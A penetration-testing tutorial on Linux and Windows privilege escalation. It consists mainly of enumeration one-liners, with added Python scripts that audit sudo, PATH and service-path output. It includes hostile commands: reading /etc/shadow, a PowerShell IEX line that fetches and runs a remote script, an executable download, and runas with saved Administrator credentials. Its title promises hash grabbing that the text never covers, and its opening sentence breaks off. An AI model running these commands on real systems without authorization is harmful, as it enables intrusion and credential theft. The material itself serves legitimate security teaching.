A Pentesters Guide - Part 4 (Grabbing Hashes and Forging External Footholds)
If you're a penetration tester, you'll know the beauty of grabbing hashes and how easy
In this reference, valuable information has been adapted and shared from 0x00sec's privilege escalation wiki and g0tmi1k's escalation guide.
When you pop a shell on a Linux box, a Windows box, or some other obscure OS, you need to get your bearings very quickly: figure out what sort of access you have, what sort of system it is, and how you can move around.
Hopefully from your recon, you should already know what operating system you're working on, but occasionally you might just know "it's unix-like of some sort".
If you're doing HackTheBox, be sure to evaluate all of these things ;)
> 😄, from @hackthebox_eu I have found that priv esc methods on linux usually resort to:
>
> - pspy
> - SUID/GUID
> - Creds in web files or DB
> - Kexploit or other CVE
> - Sudo perms
> - Strange read/write access on a file
>
> I don’t THINK I missed any, then again I am mid-festival, good job though!
>
> — chivato (@SecGus) July 25, 2019
This will tell you two things instantly: which user and groups you are running as, and, because `&&` only works in a real shell, whether your shell is indeed running some sort of bash.

```bash
whoami && id
```
This might reveal if you're inside a container or not.

```bash
env
```
You might get lucky and find a kernel version with a known Linux privesc. This will also give you some insight into your OS.

```bash
uname -a
```
If it looks something like "de0921daed50" you might be inside a Docker container.

```bash
hostname
```
This is important information, since whether you're in a container will change your tactics.

```bash
cat /proc/1/cgroup
```
If you're inside a normal VM, it'll look like this:

```text
vagrant@ubuntu-13:~$ cat /proc/1/cgroup
11:name=systemd:/
10:hugetlb:/
9:perf_event:/
8:blkio:/
7:freezer:/
6:devices:/
5:memory:/
4:cpuacct:/
3:cpu:/
2:cpuset:/
```
If you're in a container, it might look like this:

```text
vagrant@ubuntu-13:~$ docker run busybox cat /proc/1/cgroup
11:name=systemd:/
10:hugetlb:/
9:perf_event:/
8:blkio:/
7:freezer:/
6:devices:/docker/3601745b3bd54d9780436faa5f0e4f72bb46231663bb99a6bb892764917832c2
5:memory:/
4:cpuacct:/
3:cpu:/docker/3601745b3bd54d9780436faa5f0e4f72bb46231663bb99a6bb892764917832c2
2:cpuset:/
```
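The two listings above differ only in the `/docker/<id>` path components, so the check is mechanical. Here is an added example (not part of the original guide) that parses `/proc/1/cgroup` text, reports whether PID 1 sits under a known container runtime, pulls out the container id, and treats a 12-hex-character hostname as the weak hint it is. The two samples are the listings quoted above; the list of runtime markers is an assumption based on common cgroup layouts, not something the guide states.

```python
import re
import socket

# Constructed samples: the VM and container cgroup listings shown above.
VM_CGROUP = """\
11:name=systemd:/
10:hugetlb:/
9:perf_event:/
8:blkio:/
7:freezer:/
6:devices:/
5:memory:/
4:cpuacct:/
3:cpu:/
2:cpuset:/
"""

CONTAINER_CGROUP = """\
11:name=systemd:/
10:hugetlb:/
9:perf_event:/
8:blkio:/
7:freezer:/
6:devices:/docker/3601745b3bd54d9780436faa5f0e4f72bb46231663bb99a6bb892764917832c2
5:memory:/
4:cpuacct:/
3:cpu:/docker/3601745b3bd54d9780436faa5f0e4f72bb46231663bb99a6bb892764917832c2
2:cpuset:/
"""

# Assumed runtime names that appear as a path component (or "<name>-<id>.scope" under the
# systemd cgroup driver) when PID 1 is inside a container.
RUNTIME_MARKERS = ("docker", "lxc", "kubepods", "containerd", "libpod")
LONG_HEX_ID = re.compile(r"[0-9a-f]{32,}")      # docker/containerd style container ids
SHORT_HEX_ID = re.compile(r"^[0-9a-f]{12}$")    # docker's default hostname is the 12-char short id


def parse_cgroup(text):
    """Split /proc/1/cgroup into (hierarchy_id, controllers, path) tuples.
    cgroup v1 has one line per controller; cgroup v2 has a single '0::/path' line."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":", 2)
        if len(parts) == 3:
            entries.append(tuple(parts))
    return entries


def container_hint(cgroup_text, hostname=None):
    """Decide whether PID 1's cgroup path names a container runtime; the hostname is only a hint."""
    verdict = {"in_container": False, "runtime": None, "container_id": None, "reasons": []}
    for _, controllers, path in parse_cgroup(cgroup_text):
        comps = [c for c in path.split("/") if c]
        for idx, comp in enumerate(comps):
            base = re.split(r"[.-]", comp, 1)[0]
            if base not in RUNTIME_MARKERS:
                continue
            verdict["in_container"] = True
            verdict["runtime"] = verdict["runtime"] or base
            # The id is either embedded in this component (docker-<id>.scope) or the next one.
            found = LONG_HEX_ID.search(comp)
            if not found and idx + 1 < len(comps):
                found = LONG_HEX_ID.search(comps[idx + 1])
            if found:
                verdict["container_id"] = found.group(0)
            verdict["reasons"].append(f"{controllers}: {path}")
            break
    if hostname and SHORT_HEX_ID.match(hostname):
        verdict["reasons"].append(f"hostname {hostname!r} looks like a docker short id")
    return verdict


def live_hint():
    """Run the check on the current system (Linux only); returns None where /proc is absent."""
    try:
        with open("/proc/1/cgroup") as fh:
            return container_hint(fh.read(), socket.gethostname())
    except OSError:
        return None


if __name__ == "__main__":
    for label, sample in (("vm", VM_CGROUP), ("container", CONTAINER_CGROUP)):
        print(label, container_hint(sample))
    print("this host", live_hint())
```

A bare `/` path for every controller is not proof of a VM (systemd puts ordinary services under `/system.slice/...`), which is why the verdict keys on the runtime name rather than on "path is not `/`".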
Feel free to extend this list however you like; the accessible executables will be returned along with their path.

```bash
for item in iptables id ifconfig ip netstat arp tmux perl python ruby ls gcc wget; do which "$item"; done
```
You might find that your shell hasn't got a properly set PATH; this massively impacts which applications you have access to.

```bash
echo $PATH
```
If your PATH is inaccurate, or you're having trouble executing commands, this will save your day. It lists every directory that holds an executable:

```bash
find . -executable 2>/dev/null | rev | cut -d "/" -f 2-200 | rev | sort -u
```
Or if you want to grep for bin folders:

```bash
find . -executable 2>/dev/null | rev | cut -d "/" -f 2-200 | rev | sort -u | grep bin
```
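The `rev | cut | rev | sort | uniq` pipeline just strips the last path component and de-duplicates. As an added example (not code from the original guide), here is the same logic in Python, extended to compare the bin directories found on disk against the current PATH so a broken PATH can be repaired, and to flag empty or relative PATH entries, which make lookups depend on the working directory. The `find` output is a constructed sample; no filesystem is read.

```python
import posixpath

# Constructed sample of `find / -executable` output; directories appear too, since they are -executable.
FIND_OUTPUT = """\
/usr/bin
/usr/bin/id
/usr/bin/perl
/usr/local/bin/custom-tool
/opt/app/bin/app
/opt/app/bin/helper
/home/user/.local/bin/tool
/home/user/scripts
/home/user/scripts/backup.sh
"""


def executable_dirs(find_output, only_bin=False):
    """Python equivalent of `rev | cut -d / -f 2- | rev | sort | uniq` (plus the optional `grep bin`):
    drop the last path component of every line and return the distinct parent directories."""
    dirs = set()
    for line in find_output.splitlines():
        line = line.strip()
        if not line:
            continue
        parent = posixpath.dirname(line)
        if parent and (not only_bin or "bin" in parent):
            dirs.add(parent)
    return sorted(dirs)


def path_entries(path_value):
    """Split PATH; an empty entry (leading, trailing or doubled colon) means the current directory."""
    return [entry or "." for entry in path_value.split(":")] if path_value else []


def path_report(path_value, find_output):
    """Compare the bin directories that exist on disk with what PATH actually contains."""
    entries = path_entries(path_value)
    on_disk = executable_dirs(find_output, only_bin=True)
    return {
        "entries": entries,
        "missing_from_path": [d for d in on_disk if d not in entries],
        # Relative or empty entries are a hardening finding in their own right.
        "relative_entries": [e for e in entries if not e.startswith("/")],
    }


def suggest_path(path_value, find_output):
    """Return PATH with the on-disk bin directories it lacks appended, original order preserved."""
    report = path_report(path_value, find_output)
    return ":".join(report["entries"] + report["missing_from_path"])


if __name__ == "__main__":
    import os
    print(executable_dirs(FIND_OUTPUT, only_bin=True))
    print(path_report(os.environ.get("PATH", ""), FIND_OUTPUT))
    print("export PATH=" + suggest_path(os.environ.get("PATH", ""), FIND_OUTPUT))
```

On a real box you would feed it the actual `find / -executable 2>/dev/null` output and the live `$PATH`; the `__main__` block does the latter.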
World-writable files and directories, with the noisy locations filtered out (adjust the excluded paths as needed):

```bash
find / -writable -type f -o -writable -type d 2>/dev/null | grep -Ev "^(/proc|/home/user|/tmp)"
```
Is somebody actively working on the machine? Files modified in the last ten minutes:

```bash
find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
```
Does anything pop out here?

```bash
ps -ef
ps -ef | grep root
ps aux
```
SUID and SGID binaries:

```bash
find / \( -perm -u=s -o -perm -g=s \) -type f 2>/dev/null
```
Linux can grant specific capabilities to individual binaries; an over-privileged file capability has been the route to reading protected files in many different CTFs and challenges.

From the / directory, run this:

```bash
getcap -r / 2>/dev/null
```

https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux
This will find world-writable (and world-executable) directories:

```bash
find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null
```
Can you read the password files?

```bash
cat /etc/shadow
cat /etc/passwd
```
It might be simpler than you think!

```bash
sudo -l
sudo -s
cat /etc/sudoers
grep sudo ~/.bash_history
less ~/.bash_history
```
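`sudo -l` output is easy to skim on one box and tedious across many, so here is an added example (not from the original guide) that parses it into structured entries and flags the ones an auditor would look at first: rules with `NOPASSWD`, rules that allow `ALL` commands, and rules that may run as any user. The sample output below is constructed for a hypothetical user `alice` on host `web01`; the entry regex assumes sudo's usual `(runas_user : runas_group) TAG: command` layout.

```python
import re

# Constructed sample of `sudo -l` output (hypothetical user and host).
SUDO_L_OUTPUT = """\
Matching Defaults entries for alice on web01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on web01:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/systemctl restart nginx
    (www-data) /usr/bin/tail -f /var/log/nginx/access.log
"""

# "(runas_user[ : runas_group]) [TAG: ...] command"; tags are upper-case words ending in a colon.
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudo_l(text):
    """Return one dict per command entry listed after the 'may run the following commands' line."""
    entries = []
    in_commands = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        match = ENTRY_RE.match(line)
        if not match:
            continue
        runas = [part.strip() for part in match.group("runas").split(":")]
        tags = [tag[:-1] for tag in re.findall(r"[A-Z]+:", match.group("tags"))]
        entries.append({
            "runas_user": runas[0],
            "runas_group": runas[1] if len(runas) > 1 else None,
            "tags": tags,
            "command": match.group("cmd"),
        })
    return entries


def audit_sudo(entries):
    """Flag the entries a reviewer would want to look at first; the flags are audit findings, not verdicts."""
    findings = []
    for entry in entries:
        flags = []
        if "NOPASSWD" in entry["tags"]:
            flags.append("no password required")
        if entry["command"] == "ALL":
            flags.append("any command allowed")
        if entry["runas_user"] == "ALL":
            flags.append("may run as any user")
        if flags:
            findings.append({"command": entry["command"], "runas_user": entry["runas_user"], "flags": flags})
    return findings


if __name__ == "__main__":
    for finding in audit_sudo(parse_sudo_l(SUDO_L_OUTPUT)):
        print(finding)
```

Pipe real output in with `sudo -l | python3 audit.py` after swapping the sample for `sys.stdin.read()`; the parser ignores the Defaults block and blank lines, so it copes with the full output rather than just the command section.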
Download pspy:

```bash
wget https://github.com/DominicBreuker/pspy/releases/download/v1.0.0/pspy32s
```

Once downloaded, `chmod +x pspy32s` and run it with `./pspy32s`. This will take over the entire terminal or shell, so be sure to start another shell if you're intending on doing some more poking around! Too many times have I started pspy just to ctrl+c when I had what I was looking for and to lose my shell. Infuriating. For reference, you can launch a Perl reverse shell [like so](https://delta.navisec.io/reverse-shell-reference/#perl).

pspy monitors running processes; typically this will pick up things like cron job scripts and the like. I recommend performing actions such as clicking around web apps on the box or SSH'ing in while it is running.
Unquoted service paths: this occurs when a service's executable path isn't wrapped in quotes. The first command lists auto-start services outside `C:\Windows` whose path contains no quote character; the second checks who can write to the folder, and the last two restart the service.

```text
C:\> wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
C:\> icacls "C:\Program Files\Some Folder\"
C:\> sc stop [service name]
C:\> sc start [service name]
```
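The `findstr` chain above filters on the presence of a quote character, which also discards services whose path is perfectly safe because it has no spaces. As an added example (not part of the original guide), this Python audit parses the fixed-width table `wmic service get name,displayname,pathname,startmode` prints (wmic orders the columns alphabetically and pads them to the header widths), applies the same three filters, and then only reports paths that actually contain a space, together with the quoted value the service's binary path should be set to. The table rows are constructed; no real services are queried.

```python
import re

COLUMNS = ("DisplayName", "Name", "PathName", "StartMode")
_FMT = "{:<28}{:<16}{:<58}{}"

# Constructed rows in wmic's layout (alphabetical columns, fixed widths).
_ROWS = [
    ("Example Agent", "ExampleAgent", r"C:\Program Files\Example Corp\agent.exe", "Auto"),
    ("Example Quoted", "ExampleQuoted", r'"C:\Program Files\Example Corp\quoted.exe" -service', "Auto"),
    ("Windows Update", "wuauserv", r"C:\Windows\system32\svchost.exe -k netsvcs", "Manual"),
    ("Plain Service", "PlainSvc", r"C:\svc\plain.exe", "Auto"),
    ("Spaced Manual", "SpacedManual", r"C:\Program Files\Other\tool.exe", "Manual"),
]
WMIC_OUTPUT = "\n".join([_FMT.format(*COLUMNS)] + [_FMT.format(*row) for row in _ROWS]) + "\n"


def parse_wmic_table(text):
    """Slice each row at the header's column offsets; column names are located with a regex
    because a plain str.index('Name') would match inside 'DisplayName'."""
    lines = [line.rstrip() for line in text.splitlines() if line.strip()]
    header, rows = lines[0], lines[1:]
    columns = [(m.group(0), m.start()) for m in re.finditer(r"\S+", header)]
    records = []
    for row in rows:
        record = {}
        for idx, (name, start) in enumerate(columns):
            end = columns[idx + 1][1] if idx + 1 < len(columns) else None
            record[name] = row[start:end].strip()
        records.append(record)
    return records


def executable_from_path(pathname):
    """Return (executable, was_quoted). A quoted path ends at the closing quote; an unquoted one
    is taken up to the first '.exe', since arguments may follow it."""
    pathname = pathname.strip()
    if pathname.startswith('"'):
        end = pathname.find('"', 1)
        return (pathname[1:end] if end > 0 else pathname[1:]), True
    match = re.match(r"(?i)(.*?\.exe)", pathname)
    return (match.group(1) if match else pathname), False


def unquoted_service_paths(text):
    """Auto-start services outside C:\\Windows whose executable path is unquoted AND contains a space."""
    findings = []
    for record in parse_wmic_table(text):
        if record["StartMode"].lower() != "auto":
            continue
        exe, quoted = executable_from_path(record["PathName"])
        if quoted or exe.lower().startswith("c:\\windows\\"):
            continue
        if " " in exe:
            findings.append({"name": record["Name"], "path": exe, "quoted_path": f'"{exe}"'})
    return findings


if __name__ == "__main__":
    for finding in unquoted_service_paths(WMIC_OUTPUT):
        print(finding)
```

The `quoted_path` value is what the remediation sets the service's binary path to; `icacls` on the parent folders, as above, tells you whether anyone other than administrators can write there.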
There is a process called 'Unattended installs' where system administrators can automate the installation of Windows. They usually leave an `unattended.xml` file behind. It will often contain configuration settings as well as the Administrator credentials! Other files to look for include `sysprep.xml`.
Something that is used occasionally in CTFs is stored credentials with runas. For example:

(Not so much a privesc tip, but certainly useful: this pulls a file down with PowerShell.)

```powershell
powershell.exe -command "(New-Object System.Net.WebClient).DownloadFile(\"http://127.0.0.1:8080/file.exe\", \"C:\Users\user\file.exe\")"
```

The following will show stored credentials:

```text
cmdkey /list
```

And this will execute your executable:

```text
runas /profile /savecred /user:ACCESS\Administrator "C:\Users\security\archive.exe"
```
A great tool for Windows privilege escalation is PowerUp.

From PowerShell:

```powershell
IEX (New-Object Net.WebClient).DownloadString("http://bit.ly/1PdjSHk")
```

After a download:

```powershell
Import-Module "$(Get-Location)\PowerUp.ps1"
```

Running:

```powershell
Invoke-AllChecks
```

You can find a good cheat sheet for PowerUp [here](https://h4ck.co/wp-content/uploads/2017/11/PowerUp.pdf).